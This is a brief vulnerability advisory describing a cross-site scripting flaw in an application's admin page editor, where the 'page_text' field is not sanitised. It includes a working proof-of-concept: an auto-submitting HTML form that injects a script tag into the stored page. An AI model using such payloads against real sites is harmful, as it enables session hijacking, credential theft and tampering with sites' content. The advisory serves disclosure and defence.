XSS
The vulnerability exists due to failure in the "index.php?admin=static_pages_edit&pk=home" script to properly sanitize user-supplied input in "page_text" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: <form action="http://host/index.php?admin=static_pages_edit&pk=home" method="post" name="main"><input type="hidden" name="pk" value="home"><input type="hidden" name="page_tittle" value="Home"><input type="hidden" name="page_text" value="<script>alert('XSS')</script>"><input type="submit" name="submit" value="Save"></form><script>document.main.submit();</script>